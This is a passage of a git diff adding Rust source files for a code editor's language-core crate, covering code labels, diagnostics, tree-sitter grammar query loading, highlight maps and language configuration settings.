rename to crates/language_core/LICENSE-GPL diff --git a/crates/language_core/src/code_label.rs b/crates/language_core/src/code_label.rs new file mode 100644 index 0000000000000000000000000000000000000000..0a98743d02b3861d248498893eef3972422d4758 --- /dev/null +++ b/crates/language_core/src/code_label.rs @@ -0,0 +1,122 @@ +use crate::highlight_map::HighlightId; +use std::ops::Range; + +#[derive(Debug, Clone)] +pub struct Symbol { + pub name: String, + pub kind: lsp::SymbolKind, + pub container_name: Option, +} + +#[derive(Clone, Debug, Default, PartialEq, Eq)] +pub struct CodeLabel { + /// The text to display. + pub text: String, + /// Syntax highlighting runs. + pub runs: Vec<(Range, HighlightId)>, + /// The portion of the text that should be used in fuzzy filtering. + pub filter_range: Range, +} + +#[derive(Clone, Debug, Default, PartialEq, Eq)] +pub struct CodeLabelBuilder { + /// The text to display. + text: String, + /// Syntax highlighting runs. + runs: Vec<(Range, HighlightId)>, + /// The portion of the text that should be used in fuzzy filtering. + filter_range: Range, +} + +impl CodeLabel { + pub fn plain(text: String, filter_text: Option<&str>) -> Self { + Self::filtered(text.clone(), text.len(), filter_text, Vec::new()) + } + + pub fn filtered( + text: String, + label_len: usize, + filter_text: Option<&str>, + runs: Vec<(Range, HighlightId)>, + ) -> Self { + assert!(label_len <= text.len()); + let filter_range = filter_text + .and_then(|filter| text.find(filter).map(|index| index..index + filter.len())) + .unwrap_or(0..label_len); + Self::new(text, filter_range, runs) + } + + pub fn new( + text: String, + filter_range: Range, + runs: Vec<(Range, HighlightId)>, + ) -> Self { + assert!( + text.get(filter_range.clone()).is_some(), + "invalid filter range" + ); + runs.iter().for_each(|(range, _)| { + assert!( + text.get(range.clone()).is_some(), + "invalid run range with inputs. 
Requested range {range:?} in text '{text}'", + ); + }); + Self { + runs, + filter_range, + text, + } + } + + pub fn text(&self) -> &str { + self.text.as_str() + } + + pub fn filter_text(&self) -> &str { + &self.text[self.filter_range.clone()] + } +} + +impl From for CodeLabel { + fn from(value: String) -> Self { + Self::plain(value, None) + } +} + +impl From<&str> for CodeLabel { + fn from(value: &str) -> Self { + Self::plain(value.to_string(), None) + } +} + +impl CodeLabelBuilder { + pub fn respan_filter_range(&mut self, filter_text: Option<&str>) { + self.filter_range = filter_text + .and_then(|filter| { + self.text + .find(filter) + .map(|index| index..index + filter.len()) + }) + .unwrap_or(0..self.text.len()); + } + + pub fn push_str(&mut self, text: &str, highlight: Option) { + let start_index = self.text.len(); + self.text.push_str(text); + if let Some(highlight) = highlight { + let end_index = self.text.len(); + self.runs.push((start_index..end_index, highlight)); + } + } + + pub fn build(mut self) -> CodeLabel { + if self.filter_range.end == 0 { + self.respan_filter_range(None); + } + CodeLabel { + text: self.text, + runs: self.runs, + filter_range: self.filter_range, + } + } +} diff --git a/crates/language_core/src/diagnostic.rs b/crates/language_core/src/diagnostic.rs new file mode 100644 index 0000000000000000000000000000000000000000..9a468a14b863a94ef23e00c3e15edd9fa2d8b09a --- /dev/null +++ b/crates/language_core/src/diagnostic.rs @@ -0,0 +1,76 @@ +use gpui::SharedString; +use lsp::{DiagnosticSeverity, NumberOrString}; +use serde::{Deserialize, Serialize}; +use serde_json::Value; + +/// A diagnostic associated with a certain range of a buffer. +#[derive(Clone, Debug, PartialEq, Eq, Serialize, Deserialize)] +pub struct Diagnostic { + /// The name of the service that produced this diagnostic. + pub source: Option, + /// The ID provided by the dynamic registration that produced this diagnostic. 
+ pub registration_id: Option, + /// A machine-readable code that identifies this diagnostic. + pub code: Option, + pub code_description: Option, + /// Whether this diagnostic is a hint, warning, or error. + pub severity: DiagnosticSeverity, + /// The human-readable message associated with this diagnostic. + pub message: String, + /// The human-readable message (in markdown format) + pub markdown: Option, + /// An id that identifies the group to which this diagnostic belongs. + /// + /// When a language server produces a diagnostic with + /// one or more associated diagnostics, those diagnostics are all + /// assigned a single group ID. + pub group_id: usize, + /// Whether this diagnostic is the primary diagnostic for its group. + /// + /// In a given group, the primary diagnostic is the top-level diagnostic + /// returned by the language server. The non-primary diagnostics are the + /// associated diagnostics. + pub is_primary: bool, + /// Whether this diagnostic is considered to originate from an analysis of + /// files on disk, as opposed to any unsaved buffer contents. This is a + /// property of a given diagnostic source, and is configured for a given + /// language server via the `LspAdapter::disk_based_diagnostic_sources` method + /// for the language server. + pub is_disk_based: bool, + /// Whether this diagnostic marks unnecessary code. + pub is_unnecessary: bool, + /// Quick separation of diagnostics groups based by their source. + pub source_kind: DiagnosticSourceKind, + /// Data from language server that produced this diagnostic. Passed back to the LS when we request code actions for this diagnostic. + pub data: Option, + /// Whether to underline the corresponding text range in the editor. 
+ pub underline: bool, +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize)] +pub enum DiagnosticSourceKind { + Pulled, + Pushed, + Other, +} + +impl Default for Diagnostic { + fn default() -> Self { + Self { + source: Default::default(), + source_kind: DiagnosticSourceKind::Other, + code: None, + code_description: None, + severity: DiagnosticSeverity::ERROR, + message: Default::default(), + markdown: None, + group_id: 0, + is_primary: false, + is_disk_based: false, + is_unnecessary: false, + underline: true, + data: None, + registration_id: None, + } + } +} diff --git a/crates/language_core/src/grammar.rs b/crates/language_core/src/grammar.rs new file mode 100644 index 0000000000000000000000000000000000000000..54e9a3f1b3309718436b206874802779925a9d04 --- /dev/null +++ b/crates/language_core/src/grammar.rs @@ -0,0 +1,755 @@ +use crate::{ + HighlightId, HighlightMap, LanguageConfig, LanguageConfigOverride, LanguageName, + LanguageQueries, language_config::BracketPairConfig, +}; +use anyhow::{Context as _, Result}; +use collections::HashMap; +use gpui::SharedString; +use lsp::LanguageServerName; +use parking_lot::Mutex; +use std::sync::atomic::{AtomicUsize, Ordering::SeqCst}; +use tree_sitter::Query; + +pub static NEXT_GRAMMAR_ID: AtomicUsize = AtomicUsize::new(0); + +#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)] +pub struct GrammarId(pub usize); + +impl GrammarId { + pub fn new() -> Self { + Self(NEXT_GRAMMAR_ID.fetch_add(1, SeqCst)) + } +} + +impl Default for GrammarId { + fn default() -> Self { + Self::new() + } +} + +pub struct Grammar { + id: GrammarId, + pub ts_language: tree_sitter::Language, + pub error_query: Option, + pub highlights_config: Option, + pub brackets_config: Option, + pub redactions_config: Option, + pub runnable_config: Option, + pub indents_config: Option, + pub outline_config: Option, + pub text_object_config: Option, + pub injection_config: Option, + pub override_config: Option, + pub 
debug_variables_config: Option, + pub highlight_map: Mutex, +} + +pub struct HighlightsConfig { + pub query: Query, + pub identifier_capture_indices: Vec, +} + +pub struct IndentConfig { + pub query: Query, + pub indent_capture_ix: u32, + pub start_capture_ix: Option, + pub end_capture_ix: Option, + pub outdent_capture_ix: Option, + pub suffixed_start_captures: HashMap, +} + +pub struct OutlineConfig { + pub query: Query, + pub item_capture_ix: u32, + pub name_capture_ix: u32, + pub context_capture_ix: Option, + pub extra_context_capture_ix: Option, + pub open_capture_ix: Option, + pub close_capture_ix: Option, + pub annotation_capture_ix: Option, +} + +#[derive(Debug, Clone, Copy, PartialEq)] +pub enum DebuggerTextObject { + Variable, + Scope, +} + +impl DebuggerTextObject { + pub fn from_capture_name(name: &str) -> Option { + match name { + "debug-variable" => Some(DebuggerTextObject::Variable), + "debug-scope" => Some(DebuggerTextObject::Scope), + _ => None, + } + } +} + +#[derive(Debug, Clone, Copy, PartialEq)] +pub enum TextObject { + InsideFunction, + AroundFunction, + InsideClass, + AroundClass, + InsideComment, + AroundComment, +} + +impl TextObject { + pub fn from_capture_name(name: &str) -> Option { + match name { + "function.inside" => Some(TextObject::InsideFunction), + "function.around" => Some(TextObject::AroundFunction), + "class.inside" => Some(TextObject::InsideClass), + "class.around" => Some(TextObject::AroundClass), + "comment.inside" => Some(TextObject::InsideComment), + "comment.around" => Some(TextObject::AroundComment), + _ => None, + } + } + + pub fn around(&self) -> Option { + match self { + TextObject::InsideFunction => Some(TextObject::AroundFunction), + TextObject::InsideClass => Some(TextObject::AroundClass), + TextObject::InsideComment => Some(TextObject::AroundComment), + _ => None, + } + } +} + +pub struct TextObjectConfig { + pub query: Query, + pub text_objects_by_capture_ix: Vec<(u32, TextObject)>, +} + +pub struct 
InjectionConfig { + pub query: Query, + pub content_capture_ix: u32, + pub language_capture_ix: Option, + pub patterns: Vec, +} + +pub struct RedactionConfig { + pub query: Query, + pub redaction_capture_ix: u32, +} + +#[derive(Clone, Debug, PartialEq)] +pub enum RunnableCapture { + Named(SharedString), + Run, +} + +pub struct RunnableConfig { + pub query: Query, + /// A mapping from capture index to capture kind + pub extra_captures: Vec, +} + +pub struct OverrideConfig { + pub query: Query, + pub values: HashMap, +} + +#[derive(Debug)] +pub struct OverrideEntry { + pub name: String, + pub range_is_inclusive: bool, + pub value: LanguageConfigOverride, +} + +#[derive(Default, Clone)] +pub struct InjectionPatternConfig { + pub language: Option>, + pub combined: bool, +} + +#[derive(Debug)] +pub struct BracketsConfig { + pub query: Query, + pub open_capture_ix: u32, + pub close_capture_ix: u32, + pub patterns: Vec, +} + +#[derive(Clone, Debug, Default)] +pub struct BracketsPatternConfig { + pub newline_only: bool, + pub rainbow_exclude: bool, +} + +pub struct DebugVariablesConfig { + pub query: Query, + pub objects_by_capture_ix: Vec<(u32, DebuggerTextObject)>, +} + +enum Capture<'a> { + Required(&'static str, &'a mut u32), + Optional(&'static str, &'a mut Option), +} + +fn populate_capture_indices( + query: &Query, + language_name: &LanguageName, + query_type: &str, + expected_prefixes: &[&str], + captures: &mut [Capture<'_>], +) -> bool { + let mut found_required_indices = Vec::new(); + 'outer: for (ix, name) in query.capture_names().iter().enumerate() { + for (required_ix, capture) in captures.iter_mut().enumerate() { + match capture { + Capture::Required(capture_name, index) if capture_name == name => { + **index = ix as u32; + found_required_indices.push(required_ix); + continue 'outer; + } + Capture::Optional(capture_name, index) if capture_name == name => { + **index = Some(ix as u32); + continue 'outer; + } + _ => {} + } + } + if !name.starts_with("_") + && 
!expected_prefixes + .iter() + .any(|&prefix| name.starts_with(prefix)) + { + log::warn!( + "unrecognized capture name '{}' in {} {} TreeSitter query \ + (suppress this warning by prefixing with '_')", + name, + language_name, + query_type + ); + } + } + let mut missing_required_captures = Vec::new(); + for (capture_ix, capture) in captures.iter().enumerate() { + if let Capture::Required(capture_name, _) = capture + && !found_required_indices.contains(&capture_ix) + { + missing_required_captures.push(*capture_name); + } + } + let success = missing_required_captures.is_empty(); + if !success { + log::error!( + "missing required capture(s) in {} {} TreeSitter query: {}", + language_name, + query_type, + missing_required_captures.join(", ") + ); + } + success +} + +impl Grammar { + pub fn new(ts_language: tree_sitter::Language) -> Self { + Self { + id: GrammarId::new(), + highlights_config: None, + brackets_config: None, + outline_config: None, + text_object_config: None, + indents_config: None, + injection_config: None, + override_config: None, + redactions_config: None, + runnable_config: None, + error_query: Query::new(&ts_language, "(ERROR) @error").ok(), + debug_variables_config: None, + ts_language, + highlight_map: Default::default(), + } + } + + pub fn id(&self) -> GrammarId { + self.id + } + + pub fn highlight_map(&self) -> HighlightMap { + self.highlight_map.lock().clone() + } + + pub fn highlight_id_for_name(&self, name: &str) -> Option { + self.highlights_config + .as_ref()? + .query + .capture_index_for_name(name) + .and_then(|capture_id| self.highlight_map.lock().get(capture_id)) + } + + pub fn debug_variables_config(&self) -> Option<&DebugVariablesConfig> { + self.debug_variables_config.as_ref() + } + + /// Load all queries from `LanguageQueries` into this grammar, mutating the + /// associated `LanguageConfig` (the override query clears + /// `brackets.disabled_scopes_by_bracket_ix`). 
+ pub fn with_queries( + mut self, + queries: LanguageQueries, + config: &mut LanguageConfig, + ) -> Result { + let name = &config.name; + if let Some(query) = queries.highlights { + self = self + .with_highlights_query(query.as_ref()) + .context("Error loading highlights query")?; + } + if let Some(query) = queries.brackets { + self = self + .with_brackets_query(query.as_ref(), name) + .context("Error loading brackets query")?; + } + if let Some(query) = queries.indents { + self = self + .with_indents_query(query.as_ref(), name) + .context("Error loading indents query")?; + } + if let Some(query) = queries.outline { + self = self + .with_outline_query(query.as_ref(), name) + .context("Error loading outline query")?; + } + if let Some(query) = queries.injections { + self = self + .with_injection_query(query.as_ref(), name) + .context("Error loading injection query")?; + } + if let Some(query) = queries.overrides { + self = self + .with_override_query( + query.as_ref(), + name, + &config.overrides, + &mut config.brackets, + &config.scope_opt_in_language_servers, + ) + .context("Error loading override query")?; + } + if let Some(query) = queries.redactions { + self = self + .with_redaction_query(query.as_ref(), name) + .context("Error loading redaction query")?; + } + if let Some(query) = queries.runnables { + self = self + .with_runnable_query(query.as_ref()) + .context("Error loading runnables query")?; + } + if let Some(query) = queries.text_objects { + self = self + .with_text_object_query(query.as_ref(), name) + .context("Error loading textobject query")?; + } + if let Some(query) = queries.debugger { + self = self + .with_debug_variables_query(query.as_ref(), name) + .context("Error loading debug variables query")?; + } + Ok(self) + } + + pub fn with_highlights_query(mut self, source: &str) -> Result { + let query = Query::new(&self.ts_language, source)?; + + let mut identifier_capture_indices = Vec::new(); + for name in [ + "variable", + "constant", + 
"constructor", + "function", + "function.method", + "function.method.call", + "function.special", + "property", + "type", + "type.interface", + ] { + identifier_capture_indices.extend(query.capture_index_for_name(name)); + } + + self.highlights_config = Some(HighlightsConfig { + query, + identifier_capture_indices, + }); + + Ok(self) + } + + pub fn with_runnable_query(mut self, source: &str) -> Result { + let query = Query::new(&self.ts_language, source)?; + let extra_captures: Vec<_> = query + .capture_names() + .iter() + .map(|&name| match name { + "run" => RunnableCapture::Run, + name => RunnableCapture::Named(name.to_string().into()), + }) + .collect(); + + self.runnable_config = Some(RunnableConfig { + extra_captures, + query, + }); + + Ok(self) + } + + pub fn with_outline_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + let mut item_capture_ix = 0; + let mut name_capture_ix = 0; + let mut context_capture_ix = None; + let mut extra_context_capture_ix = None; + let mut open_capture_ix = None; + let mut close_capture_ix = None; + let mut annotation_capture_ix = None; + if populate_capture_indices( + &query, + language_name, + "outline", + &[], + &mut [ + Capture::Required("item", &mut item_capture_ix), + Capture::Required("name", &mut name_capture_ix), + Capture::Optional("context", &mut context_capture_ix), + Capture::Optional("context.extra", &mut extra_context_capture_ix), + Capture::Optional("open", &mut open_capture_ix), + Capture::Optional("close", &mut close_capture_ix), + Capture::Optional("annotation", &mut annotation_capture_ix), + ], + ) { + self.outline_config = Some(OutlineConfig { + query, + item_capture_ix, + name_capture_ix, + context_capture_ix, + extra_context_capture_ix, + open_capture_ix, + close_capture_ix, + annotation_capture_ix, + }); + } + Ok(self) + } + + pub fn with_text_object_query( + mut self, + source: &str, + language_name: &LanguageName, + ) 
-> Result { + let query = Query::new(&self.ts_language, source)?; + + let mut text_objects_by_capture_ix = Vec::new(); + for (ix, name) in query.capture_names().iter().enumerate() { + if let Some(text_object) = TextObject::from_capture_name(name) { + text_objects_by_capture_ix.push((ix as u32, text_object)); + } else { + log::warn!( + "unrecognized capture name '{}' in {} textobjects TreeSitter query", + name, + language_name, + ); + } + } + + self.text_object_config = Some(TextObjectConfig { + query, + text_objects_by_capture_ix, + }); + Ok(self) + } + + pub fn with_debug_variables_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + + let mut objects_by_capture_ix = Vec::new(); + for (ix, name) in query.capture_names().iter().enumerate() { + if let Some(text_object) = DebuggerTextObject::from_capture_name(name) { + objects_by_capture_ix.push((ix as u32, text_object)); + } else { + log::warn!( + "unrecognized capture name '{}' in {} debugger TreeSitter query", + name, + language_name, + ); + } + } + + self.debug_variables_config = Some(DebugVariablesConfig { + query, + objects_by_capture_ix, + }); + Ok(self) + } + + pub fn with_brackets_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + let mut open_capture_ix = 0; + let mut close_capture_ix = 0; + if populate_capture_indices( + &query, + language_name, + "brackets", + &[], + &mut [ + Capture::Required("open", &mut open_capture_ix), + Capture::Required("close", &mut close_capture_ix), + ], + ) { + let patterns = (0..query.pattern_count()) + .map(|ix| { + let mut config = BracketsPatternConfig::default(); + for setting in query.property_settings(ix) { + let setting_key = setting.key.as_ref(); + if setting_key == "newline.only" { + config.newline_only = true + } + if setting_key == "rainbow.exclude" { + config.rainbow_exclude = true + } + } + 
config + }) + .collect(); + self.brackets_config = Some(BracketsConfig { + query, + open_capture_ix, + close_capture_ix, + patterns, + }); + } + Ok(self) + } + + pub fn with_indents_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + let mut indent_capture_ix = 0; + let mut start_capture_ix = None; + let mut end_capture_ix = None; + let mut outdent_capture_ix = None; + if populate_capture_indices( + &query, + language_name, + "indents", + &["start."], + &mut [ + Capture::Required("indent", &mut indent_capture_ix), + Capture::Optional("start", &mut start_capture_ix), + Capture::Optional("end", &mut end_capture_ix), + Capture::Optional("outdent", &mut outdent_capture_ix), + ], + ) { + let mut suffixed_start_captures = HashMap::default(); + for (ix, name) in query.capture_names().iter().enumerate() { + if let Some(suffix) = name.strip_prefix("start.") { + suffixed_start_captures.insert(ix as u32, suffix.to_owned().into()); + } + } + + self.indents_config = Some(IndentConfig { + query, + indent_capture_ix, + start_capture_ix, + end_capture_ix, + outdent_capture_ix, + suffixed_start_captures, + }); + } + Ok(self) + } + + pub fn with_injection_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + let mut language_capture_ix = None; + let mut injection_language_capture_ix = None; + let mut content_capture_ix = None; + let mut injection_content_capture_ix = None; + if populate_capture_indices( + &query, + language_name, + "injections", + &[], + &mut [ + Capture::Optional("language", &mut language_capture_ix), + Capture::Optional("injection.language", &mut injection_language_capture_ix), + Capture::Optional("content", &mut content_capture_ix), + Capture::Optional("injection.content", &mut injection_content_capture_ix), + ], + ) { + language_capture_ix = match (language_capture_ix, 
injection_language_capture_ix) { + (None, Some(ix)) => Some(ix), + (Some(_), Some(_)) => { + anyhow::bail!("both language and injection.language captures are present"); + } + _ => language_capture_ix, + }; + content_capture_ix = match (content_capture_ix, injection_content_capture_ix) { + (None, Some(ix)) => Some(ix), + (Some(_), Some(_)) => { + anyhow::bail!("both content and injection.content captures are present") + } + _ => content_capture_ix, + }; + let patterns = (0..query.pattern_count()) + .map(|ix| { + let mut config = InjectionPatternConfig::default(); + for setting in query.property_settings(ix) { + match setting.key.as_ref() { + "language" | "injection.language" => { + config.language.clone_from(&setting.value); + } + "combined" | "injection.combined" => { + config.combined = true; + } + _ => {} + } + } + config + }) + .collect(); + if let Some(content_capture_ix) = content_capture_ix { + self.injection_config = Some(InjectionConfig { + query, + language_capture_ix, + content_capture_ix, + patterns, + }); + } else { + log::error!( + "missing required capture in injections {} TreeSitter query: \ + content or injection.content", + language_name, + ); + } + } + Ok(self) + } + + pub fn with_override_query( + mut self, + source: &str, + language_name: &LanguageName, + overrides: &HashMap, + brackets: &mut BracketPairConfig, + scope_opt_in_language_servers: &[LanguageServerName], + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + + let mut override_configs_by_id = HashMap::default(); + for (ix, mut name) in query.capture_names().iter().copied().enumerate() { + let mut range_is_inclusive = false; + if name.starts_with('_') { + continue; + } + if let Some(prefix) = name.strip_suffix(".inclusive") { + name = prefix; + range_is_inclusive = true; + } + + let value = overrides.get(name).cloned().unwrap_or_default(); + for server_name in &value.opt_into_language_servers { + if !scope_opt_in_language_servers.contains(server_name) { + 
util::debug_panic!( + "Server {server_name:?} has been opted-in by scope {name:?} but has not been marked as an opt-in server" + ); + } + } + + override_configs_by_id.insert( + ix as u32, + OverrideEntry { + name: name.to_string(), + range_is_inclusive, + value, + }, + ); + } + + let referenced_override_names = overrides + .keys() + .chain(brackets.disabled_scopes_by_bracket_ix.iter().flatten()); + + for referenced_name in referenced_override_names { + if !override_configs_by_id + .values() + .any(|entry| entry.name == *referenced_name) + { + anyhow::bail!( + "language {:?} has overrides in config not in query: {referenced_name:?}", + language_name + ); + } + } + + for entry in override_configs_by_id.values_mut() { + entry.value.disabled_bracket_ixs = brackets + .disabled_scopes_by_bracket_ix + .iter() + .enumerate() + .filter_map(|(ix, disabled_scope_names)| { + if disabled_scope_names.contains(&entry.name) { + Some(ix as u16) + } else { + None + } + }) + .collect(); + } + + brackets.disabled_scopes_by_bracket_ix.clear(); + + self.override_config = Some(OverrideConfig { + query, + values: override_configs_by_id, + }); + Ok(self) + } + + pub fn with_redaction_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + let mut redaction_capture_ix = 0; + if populate_capture_indices( + &query, + language_name, + "redactions", + &[], + &mut [Capture::Required("redact", &mut redaction_capture_ix)], + ) { + self.redactions_config = Some(RedactionConfig { + query, + redaction_capture_ix, + }); + } + Ok(self) + } +} diff --git a/crates/language_core/src/highlight_map.rs b/crates/language_core/src/highlight_map.rs new file mode 100644 index 0000000000000000000000000000000000000000..cba5cda6f7501a04966d5ce512e2fed700724d1a --- /dev/null +++ b/crates/language_core/src/highlight_map.rs @@ -0,0 +1,40 @@ +use std::{num::NonZeroU32, sync::Arc}; + +#[derive(Clone, Debug)] +pub struct 
HighlightMap(Arc<[Option]>); + +#[derive(Clone, Copy, Debug, PartialEq, Eq)] +pub struct HighlightId(NonZeroU32); + +impl HighlightId { + pub const TABSTOP_INSERT_ID: HighlightId = HighlightId(NonZeroU32::new(u32::MAX - 1).unwrap()); + pub const TABSTOP_REPLACE_ID: HighlightId = HighlightId(NonZeroU32::new(u32::MAX - 2).unwrap()); + + pub fn new(capture_id: u32) -> Self { + Self(NonZeroU32::new(capture_id + 1).unwrap_or(NonZeroU32::MAX)) + } +} + +impl From for usize { + fn from(value: HighlightId) -> Self { + value.0.get() as usize - 1 + } +} + +impl HighlightMap { + #[inline] + pub fn from_ids(highlight_ids: impl IntoIterator>) -> Self { + Self(highlight_ids.into_iter().collect()) + } + + #[inline] + pub fn get(&self, capture_id: u32) -> Option { + self.0.get(capture_id as usize).copied().flatten() + } +} + +impl Default for HighlightMap { + fn default() -> Self { + Self(Arc::new([])) + } +} diff --git a/crates/language_core/src/language_config.rs b/crates/language_core/src/language_config.rs new file mode 100644 index 0000000000000000000000000000000000000000..f412af418b7948b40e3bdac5a3a649d12d008e8a --- /dev/null +++ b/crates/language_core/src/language_config.rs @@ -0,0 +1,528 @@ +use crate::LanguageName; +use collections::{HashMap, HashSet, IndexSet}; +use gpui::SharedString; +use lsp::LanguageServerName; +use regex::Regex; +use schemars::{JsonSchema, SchemaGenerator, json_schema}; +use serde::{Deserialize, Deserializer, Serialize, Serializer, de}; +use std::{num::NonZeroU32, path::Path, sync::Arc}; +use util::serde::default_true; + +/// Controls the soft-wrapping behavior in the editor. +#[derive(Copy, Clone, Debug, Serialize, Deserialize, PartialEq, Eq, JsonSchema)] +#[serde(rename_all = "snake_case")] +pub enum SoftWrap { + /// Prefer a single line generally, unless an overly long line is encountered. + None, + /// Deprecated: use None instead. Left to avoid breaking existing users' configs. 
+ /// Prefer a single line generally, unless an overly long line is encountered. + PreferLine, + /// Soft wrap lines that exceed the editor width. + EditorWidth, + /// Soft wrap lines at the preferred line length. + PreferredLineLength, + /// Soft wrap line at the preferred line length or the editor width (whichever is smaller). + Bounded, +} + +/// Top-level configuration for a language, typically loaded from a `config.toml` +/// shipped alongside the grammar. +#[derive(Clone, Debug, Deserialize, JsonSchema)] +pub struct LanguageConfig { + /// Human-readable name of the language. + pub name: LanguageName, + /// The name of this language for a Markdown code fence block + pub code_fence_block_name: Option>, + /// Alternative language names that Jupyter kernels may report for this language. + /// Used when a kernel's `language` field differs from Zed's language name. + /// For example, the Nu extension would set this to `["nushell"]`. + #[serde(default)] + pub kernel_language_names: Vec>, + // The name of the grammar in a WASM bundle (experimental). + pub grammar: Option>, + /// The criteria for matching this language to a given file. + #[serde(flatten)] + pub matcher: LanguageMatcher, + /// List of bracket types in a language. + #[serde(default)] + pub brackets: BracketPairConfig, + /// If set to true, auto indentation uses last non empty line to determine + /// the indentation level for a new line. + #[serde(default = "auto_indent_using_last_non_empty_line_default")] + pub auto_indent_using_last_non_empty_line: bool, + // Whether indentation of pasted content should be adjusted based on the context. + #[serde(default)] + pub auto_indent_on_paste: Option, + /// A regex that is used to determine whether the indentation level should be + /// increased in the following line. 
+ #[serde(default, deserialize_with = "deserialize_regex")] + #[schemars(schema_with = "regex_json_schema")] + pub increase_indent_pattern: Option, + /// A regex that is used to determine whether the indentation level should be + /// decreased in the following line. + #[serde(default, deserialize_with = "deserialize_regex")] + #[schemars(schema_with = "regex_json_schema")] + pub decrease_indent_pattern: Option, + /// A list of rules for decreasing indentation. Each rule pairs a regex with a set of valid + /// "block-starting" tokens. When a line matches a pattern, its indentation is aligned with + /// the most recent line that began with a corresponding token. This enables context-aware + /// outdenting, like aligning an `else` with its `if`. + #[serde(default)] + pub decrease_indent_patterns: Vec, + /// A list of characters that trigger the automatic insertion of a closing + /// bracket when they immediately precede the point where an opening + /// bracket is inserted. + #[serde(default)] + pub autoclose_before: String, + /// A placeholder used internally by Semantic Index. + #[serde(default)] + pub collapsed_placeholder: String, + /// A line comment string that is inserted in e.g. `toggle comments` action. + /// A language can have multiple flavours of line comments. All of the provided line comments are + /// used for comment continuations on the next line, but only the first one is used for Editor::ToggleComments. + #[serde(default)] + pub line_comments: Vec>, + /// Delimiters and configuration for recognizing and formatting block comments. + #[serde(default)] + pub block_comment: Option, + /// Delimiters and configuration for recognizing and formatting documentation comments. + #[serde(default, alias = "documentation")] + pub documentation_comment: Option, + /// List markers that are inserted unchanged on newline (e.g., `- `, `* `, `+ `). 
+ #[serde(default)] + pub unordered_list: Vec>, + /// Configuration for ordered lists with auto-incrementing numbers on newline (e.g., `1. ` becomes `2. `). + #[serde(default)] + pub ordered_list: Vec, + /// Configuration for task lists where multiple markers map to a single continuation prefix (e.g., `- [x] ` continues as `- [ ] `). + #[serde(default)] + pub task_list: Option, + /// A list of additional regex patterns that should be treated as prefixes + /// for creating boundaries during rewrapping, ensuring content from one + /// prefixed section doesn't merge with another (e.g., markdown list items). + /// By default, Zed treats as paragraph and comment prefixes as boundaries. + #[serde(default, deserialize_with = "deserialize_regex_vec")] + #[schemars(schema_with = "regex_vec_json_schema")] + pub rewrap_prefixes: Vec, + /// A list of language servers that are allowed to run on subranges of a given language. + #[serde(default)] + pub scope_opt_in_language_servers: Vec, + #[serde(default)] + pub overrides: HashMap, + /// A list of characters that Zed should treat as word characters for the + /// purpose of features that operate on word boundaries, like 'move to next word end' + /// or a whole-word search in buffer search. + #[serde(default)] + pub word_characters: HashSet, + /// Whether to indent lines using tab characters, as opposed to multiple + /// spaces. + #[serde(default)] + pub hard_tabs: Option, + /// How many columns a tab should occupy. + #[serde(default)] + #[schemars(range(min = 1, max = 128))] + pub tab_size: Option, + /// How to soft-wrap long lines of text. + #[serde(default)] + pub soft_wrap: Option, + /// When set, selections can be wrapped using prefix/suffix pairs on both sides. + #[serde(default)] + pub wrap_characters: Option, + /// The name of a Prettier parser that will be used for this language when no file path is available. + /// If there's a parser name in the language settings, that will be used instead. 
+ #[serde(default)] + pub prettier_parser_name: Option, + /// If true, this language is only for syntax highlighting via an injection into other + /// languages, but should not appear to the user as a distinct language. + #[serde(default)] + pub hidden: bool, + /// If configured, this language contains JSX style tags, and should support auto-closing of those tags. + #[serde(default)] + pub jsx_tag_auto_close: Option, + /// A list of characters that Zed should treat as word characters for completion queries. + #[serde(default)] + pub completion_query_characters: HashSet, + /// A list of characters that Zed should treat as word characters for linked edit operations. + #[serde(default)] + pub linked_edit_characters: HashSet, + /// A list of preferred debuggers for this language. + #[serde(default)] + pub debuggers: IndexSet, +} + +impl LanguageConfig { + pub const FILE_NAME: &str = "config.toml"; + + pub fn load(config_path: impl AsRef) -> anyhow::Result { + let config = std::fs::read_to_string(config_path.as_ref())?; + toml::from_str(&config).map_err(Into::into) + } +} + +impl Default for LanguageConfig { + fn default() -> Self { + Self { + name: LanguageName::new_static(""), + code_fence_block_name: None, + kernel_language_names: Default::default(), + grammar: None, + matcher: LanguageMatcher::default(), + brackets: Default::default(), + auto_indent_using_last_non_empty_line: auto_indent_using_last_non_empty_line_default(), + auto_indent_on_paste: None, + increase_indent_pattern: Default::default(), + decrease_indent_pattern: Default::default(), + decrease_indent_patterns: Default::default(), + autoclose_before: Default::default(), + line_comments: Default::default(), + block_comment: Default::default(), + documentation_comment: Default::default(), + unordered_list: Default::default(), + ordered_list: Default::default(), + task_list: Default::default(), + rewrap_prefixes: Default::default(), + scope_opt_in_language_servers: Default::default(), + overrides: 
Default::default(), + word_characters: Default::default(), + collapsed_placeholder: Default::default(), + hard_tabs: None, + tab_size: None, + soft_wrap: None, + wrap_characters: None, + prettier_parser_name: None, + hidden: false, + jsx_tag_auto_close: None, + completion_query_characters: Default::default(), + linked_edit_characters: Default::default(), + debuggers: Default::default(), + } + } +} + +#[derive(Clone, Debug, Deserialize, Default, JsonSchema)] +pub struct DecreaseIndentConfig { + #[serde(default, deserialize_with = "deserialize_regex")] + #[schemars(schema_with = "regex_json_schema")] + pub pattern: Option, + #[serde(default)] + pub valid_after: Vec, +} + +/// Configuration for continuing ordered lists with auto-incrementing numbers. +#[derive(Clone, Debug, Deserialize, JsonSchema)] +pub struct OrderedListConfig { + /// A regex pattern with a capture group for the number portion (e.g., `(\\d+)\\. `). + pub pattern: String, + /// A format string where `{1}` is replaced with the incremented number (e.g., `{1}. `). + pub format: String, +} + +/// Configuration for continuing task lists on newline. +#[derive(Clone, Debug, Deserialize, JsonSchema)] +pub struct TaskListConfig { + /// The list markers to match (e.g., `- [ ] `, `- [x] `). + pub prefixes: Vec>, + /// The marker to insert when continuing the list on a new line 